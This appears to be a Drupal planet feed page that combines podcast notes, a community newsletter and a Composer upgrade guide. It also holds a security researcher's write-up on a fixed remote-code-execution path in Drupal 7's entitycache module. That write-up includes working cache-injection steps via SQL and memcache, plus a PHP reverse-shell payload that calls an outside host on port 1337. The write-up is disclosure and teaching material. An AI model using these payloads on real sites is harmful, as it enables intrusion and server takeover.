Feeds
FSF Events: FSF Free Software Community Meetup on December 15, 2023
Talking Drupal: Talking Drupal #426 - Needs Review Queue Initiative
Today we are talking about The Needs Review Queue Initiative, What it is, and How it’s helping to improve Drupal with guest Stephen Mustgrave. We’ll also cover Translation Management Tool as our module of the week.
For show notes visit: www.talkingDrupal.com/426
Topics- Can you give an overview of Needs Review Issue Queue Initiative
- Is the bug smash initiative related to the needs review issue queue
- Is this the same as the needs review bot
- How many issues were in the Needs Review status when you started
- How many issues today
- How long did it take until it was manageable
- How long do items stay on average
- Who else is helping
- Let’s talk through the pagination heading level issue
- What help can the community provide
- How does someone get involved
- Do you think this helps with burnout for core committers
- What’s the future of the initiative
Stephen Mustgrave - smustgrave
HostsNic Laflin - nLighteneddevelopment.com nicxvan John Picozzi - epam.com johnpicozzi Melissa Bent - linkedin.com/in/melissabent merauluka
MOTW CorrespondentMartin Anderson-Clutz - @mandclu Translation Management Tool (TMGMT)
- Brief description:
- Have you ever wanted to automate the process of creating content translations on your Drupal site? There’s a module for that.
- Brief history
- How old: created in Jan 2012
- Versions available: 7.x-1.0-rc3 and 8.x-1.15, the latter of which works with Drupal 9 and 10
- Maintainership
- Actively maintained
- Test coverage
- Documentation
- Number of open issues: 595, 139 of which are bugs against the 8.x branch
- Usage stats:
- 8,766 sites
- Maintainer(s):
- Berdir, a very prolific maintainer in his own right, who also supports well known projects like Search API, Token, Paragraphs, and many more
- Module features and usage
- Provides a tool set for automating the process of creating translations for your site content, as well as strings used within the site like menus, interface text, and so on
- Works with more than 30 translation service providers, including many that leverage human translators, but also AI-based services like DeepL and OpenAI
- Also has a plugin system to determine what text needs to be translated, so it can be easily adapted to very custom needs
- With the module installed that Translate tab on your nodes changes to have buttons to request a translation in each language
- Once a translation has been requested, it will run through states like unprocessed, active, and finished
- Also provides an option for Continuous Translation, where new and updated content is automatically submitted for translation
- Allows for professional translation at scale, using whatever kind of service works best for your site
- The need for robust translation capabilities is what originally got me started using Drupal, so it’s great to see that there are enterprise-grade options for sites that need to manage translations at scale
mcdruid.co.uk: Remote Code Execution in Drupal via cache injection, drush, entitycache, and create_function
PHP's create_function() was:
DEPRECATED as of PHP 7.2.0, and REMOVED as of PHP 8.0.0
As the docs say, its use is highly discouraged.
PHP 7 is no longer supported by the upstream developers, but it'll still be around for a while longer (because, for example, popular linux distributions provide support for years beyond the upstream End of Life).
Several years ago I stumbled across a usage of create_function in the entitycache module which was open to abuse in quite an interesting way.
The route to exploitation requires there to be a security problem already, so the Drupal Security Team agreed there was no need to issue a Security Advisory.
The module has removed the problematic code so this should not be a problem any more for sites that are staying up-to-date.
This is quite a fun vulnerability though, so let's look at how it might be exploited given the right (or should that be "wrong"?) conditions.
To be clear, we're talking about Drupal 7 and (probably) drush 8. The latest releases of both are now into double digits.
Is it unsafe input?Interestingly, the issue is in a drush specific inc file:
/** * Implements hook_drush_cache_clear(). */ function entitycache_drush_cache_clear(&$types) { $entities = entity_get_info(); foreach ($entities as $type => $info) { if (isset($info['entity cache']) && $info['entity cache']) { // You can't pass paramters to the callbacks in $types, so create an // anonymous function for each specific bin. $lamdba = create_function('', "return cache_clear_all('*', 'cache_entity_" . $type . "', TRUE);"); $types['entitycache-' . str_replace('_', '-', $type)] = $lamdba; } } }https://git.drupalcode.org/project/entitycache/-/blob/7.x-1.5/entitycach...
Let's remind ourselves of the problem with create_function(); essentially it works in a very similar way to calling eval() on the second $code parameter.
So - as is often the case - it's very risky to pass unsafe user input to it.
In this case, we might not even consider the $type variable to be user input; it comes from the array keys returned by entity_get_info().
Is there really a problem here? Well only if an attacker were able to inject something into those array keys. How might that happen?
entity_cache_info() uses a cache to minimise calls to implementations of hook_entity_info.
If an attacker is able to inject something malicious into that cache, there could be a path to Remote Code Execution here.
Let's just reiterate that this is a big "IF"; an attacker having the ability to inject things into cache is obviously already a pretty significant problem in the first place.
How might that come about? Perhaps the most obvious case would be a SQL Injection (SQLi) vulnerability. Assuming a site keeps its default cache bin in the database, a SQLi vulnerability might allow an attacker to inject their payload. We can look more closely at how that might work, but note that the entitycache project page says:
Don't bother using this module if you're not also going to use http://drupal.org/project/memcache or http://drupal.org/project/redis - the purpose of entitycache is to allow queries to be offloaded from the database onto alternative storage. There are minimal, if any, gains from using it with the default database cache.
So perhaps it's not that likely that a site using entitycache would have its cache bins in the database.
We'll also look at how an attacker might use memcache as an attack vector.
Proof of ConceptTo keep things simple initially, we'll look at conducting the attack via SQL.
Regardless of what technology the victim site is using for caching, the attack needs to achieve a few objectives.
As we consider those, keep in mind that the vulnerable code is within an implementation of hook_drush_cache_clear, so it will only run if and when caches are cleared via drush.
Objectives
- The malicious payload has to be injected into the array keys of the cached data returned by entity_cache_info().
- The injection cannot break Drupal so badly that drush cannot run a cache clear.
- However, the attacker may wish to deliberately break the site sufficiently that somebody will attempt to remedy the problem by clearing caches (insert "keep calm and clear cache" meme here!).
We can see that relevant cache item here is:
$cache = cache_get("entity_info:$langcode")The simplest possible form of attack might be to try to inject a very simple array into that cache item, with the payload in an array key. For example:
array('malicious payload' => 'foo');Let's look at what we'd need to do to inject this array into the site's cache so that this is what entity_cache_info() will return.
The simplest way to do this is to use a test Drupal 7 site and the cache API. Note that we're highly likely to break the D7 site along the way.
We can use drush to run some simple code that stores our array into the cache:
$ drush php >>> $entity_info = array('malicious payload' => 'foo'); => [ "malicious payload" => "foo", ] >>> cache_set('entity_info:en', $entity_info);Now let's look at the cache item in the db:
$ drush sqlc > SELECT * FROM cache WHERE cid = 'entity_info:en'; +----------------+-------------------------------------------+--------+------------+------------+ | cid | data | expire | created | serialized | +----------------+-------------------------------------------+--------+------------+------------+ | entity_info:en | a:1:{s:17:"malicious payload";s:3:"foo";} | 0 | 1696593295 | 1 | +----------------+-------------------------------------------+--------+------------+------------+Okay, that's pretty simple; we can see that the array was serialized. (Of course the fact that the cache API will unserialize this data may lead to other attack vectors if there's a suitable gadget chain available, but we'll ignore that for now.)
How is the site doing now? Let's try a drush status:
$ drush st Error: Class name must be a valid object or a string in entity_get_controller() (line 8216 of /var/www/html/includes/common.inc). Drush was not able to start (bootstrap) Drupal. Hint: This error can only occur once the database connection has already been successfully initiated, therefore this error generally points to a site configuration issue, and not a problem connecting to the database.That's not so great, and importantly we get the same error when try to clear caches by running drush cc all.
We've broken the site so badly that drush cannot bootstrap Drupal sufficiently to run a cache clear, so we've failed to meet the objectives.
The site can be restored by manually removing the injected cache item, but this means the attack was unsuccessful.
It seems we need to be a bit more surgical when injecting the payload into this cache item, as Drupal's bootstrap relies on being able to load some valid information from it.
We could just take the valid default value for this cache item and inject the malicious payload on top of that, but it's quite a lot of serialized data (over 13kb) and is therefore quite cumbersome to manipulate.
Through a process of trial and error, using Xdebug to step through the code, we can derive some minimal valid data that needs to be present in the cache item for drush to be able to bootstrap Drupal far enough to run a cache clear.
It's mostly the user entity that needs to be somewhat intact, but there's also a dependency on the file entity that requires a vaguely valid array structure to be in place.
Here's an example of a minimal array that we can use for the injection that allows a sufficiently full bootstrap:
$entity_info['user'] = [ 'controller class' => 'EntityCacheUserController', 'base table' => 'users', 'entity keys' => ['id' => 'uid'], 'schema_fields_sql' => ['base table' => ['uid']], 'entity cache' => TRUE, ]; $entity_info = [ 'user' => $entity_info['user'], 'file' => $entity_info['user'], 'malicious payload' => $entity_info['user'] ];Note that it seems only the user entity really needs the correct entity controller and db information, so we can reuse some of the skeleton data. It may be possible to trim this back further.
Let's try injecting that into the cache via drush php and then checking whether drush is still functional.
It's convenient to put the injection code into a script so we can iterate on it easily - the $entity_info array is the same as the code snippet above.
$ cat cache_injection.php <?php $entity_info['user'] = [ 'controller class' => 'EntityCacheUserController', 'base table' => 'users', 'entity keys' => ['id' => 'uid'], 'schema_fields_sql' => ['base table' => ['uid']], 'entity cache' => TRUE, ]; $entity_info = [ 'user' => $entity_info['user'], 'file' => $entity_info['user'], 'malicious payload' => $entity_info['user'] ]; cache_set('entity_info:en', $entity_info); $ drush scr cache_injection.php $ drush st Drupal version : 7.99-dev ...snip - no errors... $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => user [1] => file [2] => malicious payload )We can successfully run drush cc all with this in place, but all that this achieves is blowing away our injected payload and replacing it with clean values generated by hook_entity_info.
$ drush cc all 'all' cache was cleared. $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => comment [1] => node [2] => file [3] => taxonomy_term [4] => taxonomy_vocabulary [5] => user )We're making progress though.
Let's try putting an actual payload into the array key in our script:
$ tail -n7 cache_injection.php $entity_info = [ 'user' => $entity_info['user'], 'file' => $entity_info['user'], 'foo\', TRUE);} echo "code execution successful"; //' => $entity_info['user'] ]; cache_set('entity_info:en', $entity_info); $ drush scr cache_injection.php $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => user [1] => file [2] => foo', TRUE);} echo "code execution successful"; // ) $ drush cc all code execution successfulcode execution successful'all' cache was cleared.Great, so it's not very pretty but we've achieved code execution when the cache was cleared via drush.
A real attacker would no doubt want to do a bit more than just printing messages. As is often the case, escaping certain characters can be a bit tricky but you can squeeze quite a useful payload into the array key.
Having said we've achieved code execution, so far we got there by running PHP code through drush. If an attacker could do this, they don't really need to mess around with injecting payloads into the caches.
Let's work backwards now and see how this attack might work with more limited access whereby injecting data into the cache is all we can do.
Attack via SQLiIf we re-run the injection script but don't clear caches, we can look in the db to see what ended up in cache.
$ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' a:3:{s:4:"user";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:4:"file";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}s:50:"foo', TRUE);} echo "code execution successful"; //";a:5:{s:16:"controller class";s:25:"EntityCacheUserController";s:10:"base table";s:5:"users";s:11:"entity keys";a:1:{s:2:"id";s:3:"uid";}s:17:"schema_fields_sql";a:1:{s:10:"base table";a:1:{i:0;s:3:"uid";}}s:12:"entity cache";b:1;}}This is not very pretty to look at, but we can see our array has been serialized.
If we have a SQLi vulnerability to play with, it's not hard to inject this payload straight into the db.
To simulate using a payload in a SQLi attack we could store the data in a file then send it to the db in a query. We'll empty out the cache table first to prove that it's our injected payload achieving execution.
After wiping the cache manually like this, we'll call drush status to repopulate the cache with valid entries. This means we can use an UPDATE statement (as opposed to doing an INSERT if the caches are initially empty), which is a more realistic simulation of attacking a production site.
Note also that we have to ensure that any quotes in our payload are escaped appropriately, and that we don't have any newlines in the middle of our SQL statement.
I often think fiddly things like this are the hardest part of developing these PoC exploits!
# inject the payload using a drush script $ drush scr cache_injection.php # extract the payload into a SQL statement stored in a file $ echo -n "UPDATE cache SET data = '" > sqli.txt $ drush sqlq 'SELECT data FROM cache WHERE cid = "entity_info:en";' | sed "s#'#\\\\'#g" | tr -d "\n" >> sqli.txt $ echo "' WHERE cid = 'entity_info:en';" >> sqli.txt # empty the cache table, and repopulate it with valid entries $ drush sqlq 'DELETE FROM cache;' $ drush st # inject the payload, simulating SQLi $ cat sqli.txt | drush sqlc # execute the attack $ drush cc all code execution successful ...So we've now developed a single SQL statement that could be run via SQLi which will result in RCE when drush cc all is run on the victim site.
In an actual attack, the payload would be prepared on a separate test site and the injection would only happen via SQLi on the victim site.
However, as mentioned previously it's perhaps unlikely that a site using the entitycache module would be keeping its caches in the database.
Attack via memcacheHow about if the caches are in memcache; what might an attack look like then?
First we're going to assume that the attacker has network access to the memcached daemon. Hopefully this is quite unlikely in real life, but it's not impossible.
The objective of the attack will be exactly the same in that we want to inject a malicious payload into the array keys of the data cached for entity info.
The mechanics of how we might do so are a little different with a "memcache injection" though.
The Drupal memcache module (optionally) uses a key prefix to "namespace" cache items for a given site, which allows multiple applications to share the same memcached instance (and such a shared instance is one scenario in which this attack might take place).
In order to be able to inject a payload into a specific cache item, the attacker would need to find out what prefix is in use for the target site.
Here's an example of issuing a couple of commands over the network to a memcached instance in order to find out what the cache keys look like:
$ echo "stats slabs" | nc memcached 11211 | head -n2 STAT 2:chunk_size 120 STAT 2:chunks_per_page 8738 $ echo "stats cachedump 2 2" | nc memcached 11211 | head -n2 ITEM dd_d7-cache-.wildcard-node_types%3A [1 b; 0 s] ITEM dd_d7-cache-.wildcard-entity_info%3A [1 b; 0 s]This shows us that there's a Drupal site using a key prefix of dd_d7. A large site may be using multiple memcached slabs and this enumeration step may be a bit more complex.
So in this case the cache item we're looking to attack will have the key dd_d7-cache-entity_info%3Aen.
We can go through a very similar exercise to what we did with the SQL caches; using a test site to inject the minimal data structure we want into the cache, then extracting it to see exactly what it looks like when stored in a memcache key/value pair.
There are a couple of small complications we're likely to encounter with this workflow.
One of those is that Drupal typically uses compression by default in memcache. This is generally a good thing, but makes it harder to extract the payload we want to inject in plain text that's easy to manipulate.
If you've ever output a zip file or compressed web page in your terminal and ended up with a screen full of gobbledygook, that's the sort of thing that'll happen if you try to retrieve a compressed item directly from memcached.
We can get around this by disabling compression on our test site.
Another potential problem is that the memcache integration works a bit differently to database cache when it comes to expiry of items. By default, memcache won't return items once their expiry timestamp has passed, whereas the database cache will return stale items (for a while at least).
This means that if an attacker prepares a payload for memcache but leaves the expiry timestamp in tact, it's possible that the item will already be expired by the time the payload is injected into the target site, and the attack will not work.
It's not too hard to get around this by setting a fake timestamp that should avoid expiry. Note that there are at least two different types of expiry at play here; memcache itself has an expiry time, and Drupal's cache API has its own on top of this.
There's also the concept of cache flushes in Drupal memcache. It's out of scope to go into too much detail about that here, but the tl;dr is that the memcache module keeps track of when caches are flushed and tries not to return items that were stored before any such flush. An attack has more chance of succeeding if it also tries to ensure that the injected cache item doesn't fall foul of this as it'd then be treated as outdated and not returned.
Injecting an item into memcache will typically mean using the SET command.
The syntax for this command includes a flags parameter which is "opaque to the server" but is used by the PHP memcached extension to determine whether a cache item is compressed. This means that even if a site is using compression by default, an attacker can inject an uncompressed item and the application will not know the difference; the PHP integration handles the compression (or lack thereof).
Part of the syntax also tells the server how many bytes of data are about to be transmitted following the initial SET instruction. This means that if we manipulate the data we want to store in memcache, we have to ensure that the byte count remains correct.
We also need to ensure that the PHP serialized data remains consistent; for example if we change an IP address we need to ensure that the string its within still has the correct length e.g. s:80:\"foo' ...
Putting all of that together, and jumping through some more hoops to ensure that quotes are appropriately escaped, we might end up with something like the below:
$ echo -e -n "set dd_d7-cache-entity_info%3Aen 4 0 978\r\nO:8:\"stdClass\":6:{s:3:\"cid\";s:14:\"entity_info:en\";s:4:\"data\";a:3:{s:4:\"user\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:4:\"file\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}s:80:\"foo', TRUE);}\$s=fsockopen(\"172.19.0.1\",1337);\$p=proc_open(\"sh\",[\$s,\$s,\$s],\$i);//\";a:5:{s:16:\"controller class\";s:25:\"EntityCacheUserController\";s:10:\"base table\";s:5:\"users\";s:11:\"entity keys\";a:1:{s:2:\"id\";s:3:\"uid\";}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:1:{i:0;s:3:\"uid\";}}s:12:\"entity cache\";b:1;}}s:7:\"created\";i:TIMESTAMP;s:17:\"created_microtime\";d:TIMESTAMP.2850001;s:6:\"expire\";i:0;s:7:\"flushes\";i:999;}\r\n" | sed "s/TIMESTAMP/9999999999/g" | nc memcached 11211This should successfully inject a PHP reverse shell into the array keys, which gets executed when drush cc all is run and the vulnerable code passes each array key to create_function().
$ ./poison_entity_info.sh # this script contains the memcache set command above STORED $ drush ev 'print_r(array_keys(entity_get_info()));' Array ( [0] => user [1] => file [2] => foo', TRUE);}$s=fsockopen("172.19.0.1",1337);$p=proc_open("sh",[$s,$s,$s],$i);// ) $ drush cc all 'all' cache was cleared.Meanwhile in the attacker's terminal...
$ nc -nvlp 1337 Listening on 0.0.0.0 1337 Connection received on 172.19.0.3 58220 python -c 'import pty; pty.spawn("/bin/bash")' mcdruid @ drupal-7:/var/www/html$ head -n2 CHANGELOG.txt Drupal 7.xx, xxxx-xx-xx (development version) -----------------------We successfully popped an interactive reverse shell from the victim system when the drush cache clear command was run.
One final step in this attack might be to deliberately break the site just enough that the administrator will manually clear the caches to try to rectify the problem, but not so badly that clearing the caches with drush will not work.
Perhaps the injection into the entity_info cache item already achieves that goal?
Could this attack also be carried out via Redis? Probably.
I'm sharing the details of this attack scenario because I think it's an interesting one, and because well maintained sites should not be affected. In order to be exploitable the victim site has to be running an outdated version of the entitycache module, on PHP<8, and most importantly has to be vulnerable (or at least exposed) in quite a serious way; if an attacker can inject arbitrary data into a site's caches, they can do all sorts of bad things.
As always, the best advice for anyone concerned about their site(s) being vulnerable is to keep everything up-to-date; the latest releases of the entitycache module no longer call create_function().
Thanks to Greg Knaddison (greggles) for reviewing this post.
Tags: drupal-planetsecurityrcephpdrushThe Drop Times: The Transformative Power of Stories in the Drupal Community
Dear Readers,
"There's always room for a story that can transport people to another place."
—J.K. Rowling, Author of the Harry Potter Series.Stories wield an irresistible charm, not merely as narratives to absorb but as potent wellsprings of inspiration. With their unique ability to engage, convey essential messages, and kindle our imagination, stories have been passed down through generations, nestled in books, or shared through diverse media. They possess the remarkable power to evoke emotions and offer insights that resonate across cultures.
Beyond mere entertainment, stories often carry valuable lessons, acting as a bridge to connect individuals and fostering a sense of wonder and empathy. Through the art of storytelling, individuals gain fresh perspectives, discover motivation, and shape their understanding of the world and their identities.
In the Drupal community, Dries Buytaert, the visionary founder of Drupal, extends a heartfelt invitation. He encourages members to share their personal stories, illustrating how Drupal has left an indelible mark on their lives and careers. This initiative underscores the power of stories in nurturing community, collaboration, and shared experiences within the Drupal ecosystem.
As J.K. Rowling aptly notes, there's always room for stories that transport us to new realms. Within the Drupal community, these stories serve as a bridge connecting individuals through the transformative impact of Drupal on their professional journeys.
So, what is your Drupal story? Share and become part of the collective narrative that defines the Drupal experience.
Let us look into last week's stories by The Drop Times.
Last week, The Drop Times published part one of the interview featuring Grzegorz Pietrzak, a seasoned Tech Lead at Droptica specializing in PHP, Drupal, and Symfony. Engaging in a profound discussion with Thomas Alias K, a former sub-editor at TDT, Pietrzak shared distinguished perspectives on various facets of Drupal, the dynamic role of Droopler in corporate website development, and his insights into constructing effective PHP teams.
The latest featured stories by our sub-editor, Alka Elizabeth, dive into notable happenings within the Drupal community. An insightful examination of challenges encountered in Drupal Distributions and Recipes Initiative takes center stage as contributor Jim Birch sheds light on a pertinent issue. This discovery catalyzes an ongoing initiative to address and overcome challenges associated with these essential elements of Drupal development.
Further contributing to Drupal's evolution, an adjustment was proposed by Alex Pott in response to issue #339889, which is set to bring about a significant change in the upcoming 10.2.x version of the Drupal core. This modification aims to streamline the configuration system, eliminating the need to list configuration in 'getEditableConfigNames()' when using '#config_target' in forms. The goal is to enhance the developer experience by simplifying processes and eliminating redundant configuration declarations.
Additionally, a substantial change in Drupal Core has been implemented in version 10.2.x. The widely recognized EntityReferenceTestTrait has undergone a renaming to EntityReferenceFieldCreationTrait. Behind this transformative modification is the dedicated effort of contributor Stephen Mustgrave, and it officially took effect on November 16, 2023.
DrupalCon Portland 2024 is currently seeking volunteers and summit contributors. Florida DrupalCamp 2024 is gearing up for its sixteenth annual event and searching for sponsors. The event will happen at the Florida Technical College in Orlando. If you're interested in sponsoring Florida DrupalCamp 2024 or would like to get more information about the event, including dates, available training sessions, and registration details, head nowhere else. Learn more about this weeks Drupal events here.
MidCamp, the Midwest Drupal Camp, has officially opened its call for session submissions for its 2024 event. Additionally, FOSDEM, the renowned free software event fostering collaboration and idea sharing within the open-source community, invites participation in presentations for its upcoming twenty-fourth edition scheduled for February 3rd and 4th, 2024.
Specbee published a blog exploring the significance of Drupal 10 Theming. Additionally, they are hosting a webinar titled "Getting Started with Drupal 10 Theming," scheduled for December 6, 2023.
The Acquia Engage conference ended discussions centered around experimentation and exploration. These emerging trends were featured in an article by Dom Nicastro. Discover the enhanced capabilities of the Drupal platform with the introduction of new features and improvements in Drupal 10.1. Dive deeper into these updates by reading the blog.
The digital landscape undergoes further evolution as PHP unveils its newest version, PHP 8.3. This latest iteration, packed with a myriad of enhancements and refinements, is poised to make a substantial impact on web development.
Lucio Waßill's demonstration on the Migrate Module provided valuable insights into establishing a demo-ready Drupal environment. The emphasis was on optimizing content creation processes by effectively utilizing the Migrate module.
Prepare for the imminent arrival of Drupal Gutenberg 3, as the beta version is now available for testing under Gutenberg 3.0.0-beta1. Users eager to integrate this update into Drupal 10 can seamlessly do so using Composer with the installation command. Revamp Drupal search boxes effortlessly with the Better Search Block: a user-friendly solution developed by 3C Web Services and maintained by Yogesh Pawar. This module stands out for its ability to enhance both the visual appeal and functionality of Drupal search boxes.
Dries Buytaert, the visionary behind Drupal, extends a heartfelt invitation to the Drupal community, encouraging individuals to share their personal narratives on Drupal's profound impact on their lives and careers.
Explore enhanced Drupal development efficiency by delving into the synergy between Visual Studio Code and DDEV in OSTraining's latest blog post. Gain practical insights into leveraging Visual Studio Code, a widely used and robust source-code editor, to streamline and optimize your Drupal development workflows. Droptica releases Drupal Website Maintenance Guide, a comprehensive e-book tailored for Drupal website owners seeking effective strategies for support, care, and maintenance.
So these are the highlights from TheDropTimes. Feel free to contact us with any suggestions, contributions, or feedback. Thank you for being a part of our community. Until the next edition, keep exploring, sharing, and embracing the power of knowledge! Follow us on LinkedIn, Twitter and Facebook.
Sincerely,
Elma John
Sub-editor, The DropTimes
Mike Driscoll: Episode 23 – The Ruff Formatter with Charlie Marsh
The Ruff linter is a Python linter written in Rust that is super fast. The people behind Ruff recently released a new tool that is a part of Ruff that allows Ruff to format your Python code using the Black rules.
In this episode, I speak with Charlie Marsh, the original creator of Ruff and the founder of Astral, the company behind Ruff.
In this episode, we talked about:
- The Ruff formatter and linter
- How Ruff came about
- The hardest features to create
- The future of Ruff
- Python vs Rust
- and more!
The post Episode 23 – The Ruff Formatter with Charlie Marsh appeared first on Mouse Vs Python.
Four Kitchens: Using Composer for modules not ready for the next major version of Drupal
Senior Support Lead
Allan brings technological know-how and grounds it with some simple country living. His interests include DevOps, animal husbandry (raising rabbits and chickens), hiking, and automated testing.
January 1, 1970
At the time of this blog, we have done two major version upgrades of Drupal and have refined the process along the way. There has been a lot of work in the community, through the efforts of people like Matt Glaman to make this process easier.
As a Support Engineer, I see a lot of approaches for achieving the same results in many areas of my work. Here, I’d like to share with you three different ways to achieve an upgrade of a module or theme that isn’t ready for the next major Drupal version, each with pros and cons, but all absolutely acceptable.
Why do we have this problem?All new Drupal developers have a hard time with the layers of code changes that happen in the Drupal community. We have custom package types, custom install locations, patches, and scaffolding. To make the challenges worse, we have two ways to identify a module’s dependencies — that being a .info.yml file and for some, a composer.json. This is because some Drupal modules may want to build upon an existing PHP library or project, in addition to other Drupal modules. To ease the pain of having to define some dependencies twice, both in the .info.yml file and composer.json file, Drupal.org built their packagist, a repository of Composer packages, to read the .info.yml files from the root of the project and create Composer version constraints from that. For example, if the .info file contained the following:
name: My Module type: module core_version_requirement: ^8.8 || ^9 dependencies: - ctools:ctoolsThen Drupal.org’s packagist would create the following for the release that contained that .info.yml file, saving the contributed developer a lot of trouble.
{ "type": "drupal-module", "name": "drupal/my_module", "require": { "drupal/core": "^8.8 || ^9", "drupal/ctools": "*" } }I hit on something there, though. It will create that for the release the .info.yml was in. When most code changes come in the form of patches, this poses a challenge. You apply your patch to the .info.yml after you download the release from Drupal.org’s packagist. Additionally, Drupal.org doesn’t create a new release entry for every patch file in the issue queue. So you are left with the question, “How do I install a module on Drupal 10 that requires Drupal 9 so that I can patch it to make it compatible for Drupal 10?”
Drupal LenientOne of the easiest methods for those who don’t understand the ins and outs of Composer is to use the Drupal Lenient plugin. It takes a lot of the manual work out of defining new packages and works with any drupal-* typed library. Types are introduced to us through the use of the Composer Installer plugin and manipulated further with something like Composer Installers Extender. Composer plugins can be quite powerful, but they ultimately add a layer of complexity to any project over using core composer tactics.
Drupal Lenient works by taking any defined package pulled in by any means via Composer, and replaces the version constraints for drupal/core currently, at the time of this writing, with “^8 || ^9 || ^10“. So where the requirements might look like the example earlier “drupal/core“: “^8.8 || ^9“, they are replaced, making it now possible to install alongside Drupal 10, even though it might not be compatible yet. This allows you to patch, test, or use the module as is, much like if you would have downloaded the zip and thrown it into your custom modules directory.
An example may look like this:
{ "name": "vendor/project", "repositories": [ { "type": "composer", "url": "https://packages.drupal.org/8" } ], "require": { "drupal/core": "^10.0.0", "drupal/my_module": "1.x-dev", "cweagans/composer-patches": "^1.7.3", "mglaman/composer-drupal-lenient": "^1.0.3" }" extra": { "composer-exit-on-patch-failure": true, "drupal-lenient": { "allowed-list": [ "drupal/my_module" ] }, "patches": { "drupal/my_module": { "3289029: Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2022-06-16/my_module.1.x-dev.rector.patch" } }, "patchLevel": { "drupal/core": "-p2" }, } }Note the Drupal-Lenient allow list. Also note that you will need to make sure and install the plugin before trying to install the module that doesn’t support Drupal 10 in this case. If you want an excellent step-by-step, Matt put one together in the Readme.
The pros:
- Easy-peasy to install
- Feeds off the original packagist packages, so if there is an upgrade, you don’t have to do anything special to transition
The cons:
- Lenient has the control and may cause inexplicable errors when updating due to unsupported core versions
- PHP devs not familiar with Drupal Lenient won’t know to look for it
- Flaky experiences when switching in and out of branches that include this plugin. If you context switch a lot, be prepared to handle some errors due to Composer’s challenges maintaining state between branches.
- Patches to other dependencies inside composer.json still require you to run through some hoops
If you want more control over what the module can and cannot do, while keeping the core of Composer functionality without adding yet another plugin, check out this method. What we will do here is find out what version the patch or merge request is being applied against. It should be stated in the issue queue and by best practices is a dev version.
If you are a perfectionist, you can use composer install -vvv to find the url or cache file that the module came from for packages.drupal.org. It is usually one of https://packages.drupal.org/files/packages/8/p2/drupal/my_module.json or https://packages.drupal.org/files/packages/8/p2/drupal/my_module~dev.json. You will note that the Composer cache system follows a very similar structure, swapping out certain characters with dashes.
With this information, you can grab the exact package as it’s defined in the Drupal packagist. Find the version you want, and then get it into your project’s composer.json.
Let’s use Context Active Trail as an example, because at the time of this writing, there is no Drupal 10 release available.
Looking through the issue queue, we see Automated Drupal 10 compatibility fixes, which has a patch on it at. I grab the Composer package info and paste the 2.0-dev info into my composer.json under the “repositories” section as a type “package.”
Which should make your project look something like this:
{ "name": "vendor/project", "repositories": [ { "type": "package", "package": { "keywords": [ "Drupal", "Context", "Active trail", "Breadcrumbs" ], "homepage": "https://www.drupal.org/project/context_active_trail", "version": "dev-2.x", "version_normalized": "dev-2.x", "license": "GPL-2.0+", "authors": [ { "name": "Jigar Mehta (jigarius)", "homepage": "https://jigarius.com/", "role": "Maintainer" }, { "name": "jigarius", "homepage": "https://www.drupal.org/user/2492730" }, { "name": "vasi", "homepage": "https://www.drupal.org/user/390545" } ], "support": { "source": "https://git.drupalcode.org/project/context_active_trail", "issues": "https://www.drupal.org/project/issues/context_active_trail" }, "source": { "type": "git", "url": "https://git.drupalcode.org/project/context_active_trail.git", "reference": "8dc46a4cf28e0569b187e88627a30161ee93384e" }, "type": "drupal-module", "uid": "context_active_trail-3192784", "name": "drupal/context_active_trail", "extra": { "branch-alias": { "dev-2.x": "2.x-dev" }, "drupal": { "version": "8.x-2.0-rc2+1-dev", "datestamp": "1630867980", "security-coverage": { "status": "not-covered", "message": "Project has not opted into security advisory coverage!" } } }, "description": "Set the active trail based on context.", "require": { "drupal/context": "^4.1", "drupal/core": "^8.8 || ^9" } } }, { "type": "composer", "url": "https://packages.drupal.org/8" } ], "require": { "drupal/core": "^10.0.0", "drupal/context_active_trail": "2.x-dev", "cweagans/composer-patches": "^1.7.3", "mglaman/composer-drupal-lenient": "^1.0.3" }" extra": { "composer-exit-on-patch-failure": true, }, "patches": { }, "patchLevel": { "drupal/core": "-p2" }, } }Now let’s change our version criteria:
… "description": "Set the active trail based on context.", "require": { "drupal/context": "^4.1", "drupal/core": "^8.8 || ^9 || ^10" } …And then add our patch:
… extra": { "composer-exit-on-patch-failure": true, }, "patches": { "drupal/context_active_trail": { "Automated Drupal 10 compatibility fixes": "https://www.drupal.org/files/issues/2023-09-29/context_d10comp_3286756.patch" } }, "patchLevel": { "drupal/core": "-p2" }, } …Here, you will need to look to see if the patch is patching composer.json. If it is, you will need to modify your package information accordingly. For example, in this one, the fixer changes drupal/context from ^4.1 to ^5.0.0-rc1. That change looks like this:
… "description": "Set the active trail based on context.", "require": { "drupal/context": "^5.0.0-rc1", "drupal/core": "^8.8 || ^9 || ^10" } …Lastly, sometimes you run into some complications with the order packages are picked up by Composer. You may need to add an exclude element to the Drupal packagist.
… { "type": "composer", "url": "https://packages.drupal.org/8", "exclude": [ "drupal/context_active_trail" ] }, …Our final composer.json for our project could look something like this with all the edits:
